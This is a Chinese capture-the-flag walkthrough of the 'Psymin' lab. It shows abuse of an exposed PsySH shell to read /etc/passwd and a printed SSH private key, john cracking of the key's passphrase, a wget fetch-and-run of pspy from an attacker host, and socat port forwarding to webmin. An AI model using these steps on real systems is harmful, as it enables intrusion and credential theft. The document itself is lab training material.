(° ー °〃) Psymin

信息搜集

端口扫描

┌──(kalikali)-[~/temp/Psymin]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
HACK THE PLANET
 
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.10.100:22
Open 192.168.10.100:80
Open 192.168.10.100:3000
 
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzUvGOaZF4gJoYBGR4NrMZOj32x98uVDUQ0dY0RENRdIyokD8RvJG8g9g71aoh/20m4mcEEdSyp+eE9ABu1kwk=
|   256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrNZ9AQg+cgX4w0wabsDTAVeo9/VWThsF5efc2OzsFo
80/tcp   open  http    syn-ack nginx 1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
3000/tcp open  ppp?    syn-ack
| fingerprint-strings: 
|   DNSStatusRequestTCP: 
|     ^@^L^@^@^P^@^@^@^@^@^@^@^@^@Psy Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     OPTIONS / RTSP/1.0
|   DNSVersionBindReqTCP: 
|     ^CPsy Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|   GenericLines, NULL: 
|     Psy Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|   GetRequest: 
|     GET / HTTP/1.0
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     HTTP/1.0
|     Error Undefined constant "GET".
|   HTTPOptions: 
|     OPTIONS / HTTP/1.0
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     OPTIONS / HTTP/1.0
|     Error Undefined constant "OPTIONS".
|   Help: 
|     HELP
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     HELP
|     Error Undefined constant "HELP".
|   NCP: 
|     DmdT^@^@^@
|     ^@^@^@^A^@^@^@^@
|   RTSPRequest: 
|     OPTIONS / RTSP/1.0
|     Shell v0.12.4 (PHP 8.2.20 
|     cli) by Justin Hileman
|     OPTIONS / RTSP/1.0
|     Error Undefined constant "OPTIONS".
|   SSLSessionReq: 
|     ^C^A^@Psy Shell v0.12.4 (PHP 8.2.20 
|_    cli) by Justin Hileman
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=9/7%Time=66DC1CBF%P=x86_64-pc-linux-gnu%r(
SF:NULL,3C,"Psy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94
SF:\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\x20")%r(GenericLines,4C,"Psy\
SF:x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20
SF:by\x20Justin\x20Hileman\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20")%
SF:r(GetRequest,99,"GET\x20/\x20HTTP/1\.0\r\n\r\n\r\n\r\nPsy\x20Shell\x20v
SF:0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\
SF:x20Hileman\r\n>\x20GET\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x
SF:20Undefined\x20constant\x20\"GET\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\r\n
SF:>\x20")%r(Help,7A,"HELP\r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\
SF:.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\x20HELP
SF:\r\n\r\n\x20\x20\x20Error\x20\x20Undefined\x20constant\x20\"HELP\"\.\r\
SF:n\r\n>\x20\r\n>\x20")%r(NCP,38,"DmdT\^@\^@\^@\x08\x20\x08\x08\x20\x08\x
SF:08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\x08\x20\x08\
SF:x08\x20\x08\x08\x20\x08\^@\^@\^@\^A\^@\^@\^@\^@")%r(HTTPOptions,A5,"OPT
SF:IONS\x20/\x20HTTP/1\.0\r\n\r\n\r\n\r\nPsy\x20Shell\x20v0\.12\.4\x20\(PH
SF:P\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\
SF:x20OPTIONS\x20/\x20HTTP/1\.0\r\n\r\n\x20\x20\x20Error\x20\x20Undefined\
SF:x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20\r\n>\x20\r\n>\x20")%
SF:r(RTSPRequest,A5,"OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\r\n\r\nPsy\x20Shell
SF:\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Ju
SF:stin\x20Hileman\r\n>\x20OPTIONS\x20/\x20RTSP/1\.0\r\n\r\n\x20\x20\x20Er
SF:ror\x20\x20Undefined\x20constant\x20\"OPTIONS\"\.\r\n\r\n>\x20\r\n>\x20
SF:\r\n>\x20\r\n>\x20")%r(DNSVersionBindReqTCP,3E,"\^CPsy\x20Shell\x20v0\.
SF:12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x20by\x20Justin\x20
SF:Hileman\r\n>\x20")%r(DNSStatusRequestTCP,74,"\^@\^L\^@\^@\^P\^@\^@\^@\^
SF:@\^@\^@\^@\^@\^@Psy\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\
SF:x80\x94\x20cli\)\x20by\x20Justin\x20Hileman\r\n>\x20\^L\x07\r>\x20OPTIO
SF:NS\x20/\x20RTSP/1\.0\x07\x07\x07\x07")%r(SSLSessionReq,42,"\^C\^A\^@Psy
SF:\x20Shell\x20v0\.12\.4\x20\(PHP\x208\.2\.20\x20\xe2\x80\x94\x20cli\)\x2
SF:0by\x20Justin\x20Hileman\r\n>\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

				

					
				
				

					
				
				

					
				
				

					
				
			

目录扫描

┌──(kalikali)-[~/temp/Psymin]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   301,401,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 96152 / 441122 (21.80%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 96440 / 441122 (21.86%)
===============================================================
Finished
===============================================================

				

					
				
				

					
				
				

					
				
				

					
				
			

漏洞发现

踩点

敏感端口测试

尝试连接一下 3000 端口，尝试进行测试：https://github.com/bobthecow/psysh/wiki/Commands

┌──(kalikali)-[~/temp/Psymin]
└─$ nc $IP 3000
Psy Shell v0.12.4 (PHP 8.2.20 — cli) by Justin Hileman
> $a = $b = 'c'                                   
$a = $b = 'c'
WARNING: terminal is not fully functional
Press RETURN to continue 
 
= "c"
 
> ls -la
ls -la
WARNING: terminal is not fully functional
Press RETURN to continue 
 
Variables:
  $a   "c"  
  $b   "c"  
  $_   "c"

				

					
				
				

					
				
				

					
				
				

					
				
			

尝试执行相关命令，读取文件：

> echo file_get_contents("/etc/passwd")
echo file_get_contents("/etc/passwd")
WARNING: terminal is not fully functional
Press RETURN to continue 
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
alfred:x:1000:1000:alfred:/home/alfred:/bin/bash

				

					
				
				

					
				
				

					
				
				

					
				
			

利用私钥登录

尝试读取 ssh 的私钥：

> echo file_get_contents("/home/alfred/.ssh/id_rsa")
echo file_get_contents("/home/alfred/.ssh/id_rsa")
WARNING: terminal is not fully functional
Press RETURN to continue 
 
-----BEGIN OPENSSH PRIVATE KEY-----
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
mqXDfQ==
-----END OPENSSH PRIVATE KEY-----

				

					
				
				

					
				
				

					
				
				

					
				
			

利用私钥进行登录：

┌──(kalikali)-[~/temp/Psymin]
└─$ vim alfred
 
┌──(kalikali)-[~/temp/Psymin]
└─$ chmod 600 alfred 
 
┌──(kalikali)-[~/temp/Psymin]
└─$ ssh -i alfred alfred@$IP       
The authenticity of host '192.168.10.100 (192.168.10.100)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.10.100' (ED25519) to the list of known hosts.
Enter passphrase for key 'alfred':

				

					
				
				

					
				
				

					
				
				

					
				
			

发现存在密码，尝试进行爆破：

┌──(kalikali)-[~/temp/Psymin]
└─$ ssh2john alfred > hash                                                                              
 
┌──(kalikali)-[~/temp/Psymin]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash     
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alfredo          (alfred)     
1g 0:00:00:58 DONE (2024-09-07 05:43) 0.01698g/s 15.21p/s 15.21c/s 15.21C/s molly..ilovegod
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

				

					
				
				

					
				
				

					
				
				

					
				
			

尝试进行登录：

提权

信息搜集

alfred@psymin:~$ sudo -l
-bash: sudo: orden no encontrada
alfred@psymin:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
alfred@psymin:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
alfred@psymin:~$ ss -tulnp
Netid           State            Recv-Q           Send-Q                     Local Address:Port                        Peer Address:Port           Process                                   
udp             UNCONN           0                0                                0.0.0.0:68                               0.0.0.0:*                                                        
udp             UNCONN           0                0                                0.0.0.0:10000                            0.0.0.0:*                                                        
tcp             LISTEN           0                128                              0.0.0.0:22                               0.0.0.0:*                                                        
tcp             LISTEN           0                511                              0.0.0.0:80                               0.0.0.0:*                                                        
tcp             LISTEN           0                5                                0.0.0.0:3000                             0.0.0.0:*               users:(("socat",pid=466,fd=5))           
tcp             LISTEN           0                4096                           127.0.0.1:10000                            0.0.0.0:*                                                        
tcp             LISTEN           0                128                                 [::]:22                                  [::]:*                                                        
tcp             LISTEN           0                511                                 [::]:80                                  [::]:*            
alfred@psymin:~$ curl 0.0.0.0 1000
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
 
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
 
<p><em>Thank you for using nginx.</em></p>
</body>
</html>

				

					
				
				

					
				
				

					
				
				

					
				
			

尝试上传 pspy64 进行监听：

alfred@psymin:~$ cd /tmp
alfred@psymin:/tmp$ wget http://192.168.10.102:8888/lpspy64
alfred@psymin:/tmp$ chmod +x lpspy64 
alfred@psymin:/tmp$ ./lpspy64

				

					
				
				

					
				
				

					
				
				

					
				
			

发现 root 在执行某个进程，看一下：

alfred@psymin:/tmp$ cat /usr/share/webmin/webmincron/webmincron.pl
#!/usr/bin/perl
# Wrapper to run a single function via webmin cron
 
$main::no_acl_check = 1;
$main::no_referers_check = 1;
$main::webmin_script_type = 'cron';
do './webmincron-lib.pl';
$cron = $ARGV[0];
 
# Build list of args
my @args;
for(my $i=0; defined($cron->{'arg'.$i}); $i++) {
        push(@args, $cron->{'arg'.$i});
        }
 
# Force webmin script type to be cron
$main::webmin_script_type = 'cron';
$main::webmin_script_webmincron = $cron->{'module'}."::".$cron->{'func'};
 
# Require the module, call the function
eval {
        local $main::error_must_die = 1;
        &foreign_require($cron->{'module'}, $cron->{'file'});
        &foreign_call($cron->{'module'}, $cron->{'func'}, @args);
        };
$log = { %$cron };
if ($@) {
        $log->{'error'} = $@;
        }
 
# Log it, if enabled
if ($gconfig{'logsched'}) {
        &webmin_log("run", "webmincron", $cron->{'id'}, $log);
        }

				

					
				
				

					
				
				

					
				
				

					
				
			

进一步查看：

alfred@psymin:/tmp$ find / -name webmin 2>/dev/null
/etc/webmin
/etc/webmin/webmin
/etc/pam.d/webmin
/usr/bin/webmin
/usr/share/webmin
/usr/share/webmin/webmin
/usr/share/webmin/bin/webmin
/usr/share/webmin/gray-theme/webmin
/usr/share/webmin/gray-theme/images/favicons/webmin
/usr/share/webmin/authentic-theme/images/modules/webmin
/usr/share/webmin/authentic-theme/images/favicons/webmin
/usr/share/doc/webmin
/var/webmin

				

					
				
				

					
				
				

					
				
				

					
				
			

弱密码登录

尝试转发 10000 端口：

alfred@psymin:~$ socat TCP-LISTEN:10001,fork TCP4:127.0.0.1:10000&
[1] 1702

				

					
				
				

					
				
				

					
				
				

					
				
			

尝试默认用户密码：

登录成功，尝试执行相关命令！

把 shell 弹回来：

成功！